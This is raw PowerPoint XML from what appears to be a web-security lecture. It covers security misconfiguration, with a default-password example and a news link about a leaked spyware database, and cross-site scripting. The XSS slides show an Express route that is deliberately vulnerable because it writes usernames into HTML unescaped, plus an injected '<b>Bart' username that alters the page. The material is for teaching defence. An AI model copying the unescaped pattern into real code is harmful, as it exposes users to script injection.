          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The database contains a master account with a default password.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="262909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3600" noProof="0" dirty="0"/>
              <a:t>#6 Security Misconfigurations example</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515600" cy="1550168"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Spyware Company Leaves ‘Terabytes’ of Selfies, Text Messages, and Location Data Exposed Online:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://motherboard.vice.com/en_us/article/9kmj4v/spyware-company-spyfone-terabytes-data-exposed-online-leak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15106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#7 Cross-Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{691E2CCA-4214-4C79-855B-ADB73BF34FEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="2806922"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>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endParaRPr lang="en-US" i="1" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="142778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#7 Cross-Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838199" y="1690688"/>
            <a:ext cx="10515601" cy="386900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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>app.get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>('/accounts',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db.getAccounts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</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(accounts){</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response.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("&lt;ul&gt;")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for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a: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account </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> accounts){</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response.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("&lt;li&gt;"+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>account.username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>+"&lt;/li&gt;")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response.end</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("&lt;/ul&gt;")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459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Cross-Site Scripting (XSS)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2318558" y="1901841"/>
            <a:ext cx="1589512" cy="369332"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" noProof="0" dirty="0">
                <a:latin typeface="Georgia" panose="02040502050405020303" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>accounts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" noProof="0" dirty="0">
              <a:latin typeface="Georgia" panose="02040502050405020303" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Table 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2318558" y="2288021"/>
          <a:ext cx="1589512" cy="1483360"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1589512">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Username</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Lisa</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Bart</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Homer</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10003"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5181404" y="1900155"/>
            <a:ext cx="3818238" cy="199028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Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ul</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&lt;li&gt;Lisa&lt;/li&gt;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&lt;li&gt;Bart&lt;/li&gt;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&lt;li&gt;Homer&lt;/li&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="Table 7"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2318558" y="4505149"/>
          <a:ext cx="1589512" cy="1483360"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1589512">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Username</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Lisa</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&lt;b&gt;Bart</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Homer</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10003"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5203666" y="4368715"/>
            <a:ext cx="3795976" cy="199028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Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ul</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&lt;li&gt;Lisa&lt;/li&gt;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&lt;li&gt;&lt;b&gt;Bart&lt;/li&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  &lt;li&gt;Homer&lt;/li&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rounded Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9356126" y="2015152"/>
            <a:ext cx="2234512" cy="175622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US" sz="2400" dirty="0"/>
              <a:t>Lisa</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Bart</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Homer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rounded Rectangle 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9356126" y="4485744"/>
            <a:ext cx="2234512" cy="175622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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Lisa</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Bart</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Homer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Cloud Callout 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-213056" y="3029701"/>
            <a:ext cx="2353372" cy="1767016"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 55302"/>
              <a:gd name="adj2" fmla="val 82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Or worse: JavaScript code!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="82717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#7 Cross-Site Scripting (XSS)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Graphic 5" descr="Computer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBCE107A-367E-4A91-B795-E8AB39C6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5850" y="1194908"/>
            <a:ext cx="1372107" cy="1373793"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{364EAECD-4B29-4766-9148-33F2CC83ACAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5856766" y="1480744"/>
            <a:ext cx="442249" cy="856306"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C577EFEA-BBCE-4D19-A16A-91755058A587}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="801803" y="2337050"/>
            <a:ext cx="1600200" cy="424732"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" noProof="0" dirty="0"/>
              <a:t>Client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0B96A42-9C17-4E25-8524-23782D6448CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5163459" y="2302520"/>
            <a:ext cx="1828862"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Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Connector 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F445CD2-8DBF-4034-A1A1-3192CF296F7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1601903" y="2761782"/>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D0E7786C-A90E-4105-9846-FBFFB54AD2B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6077890" y="2806307"/>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2225498C-F737-415E-A9C9-91D9444B01AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1713575" y="3180533"/>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Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
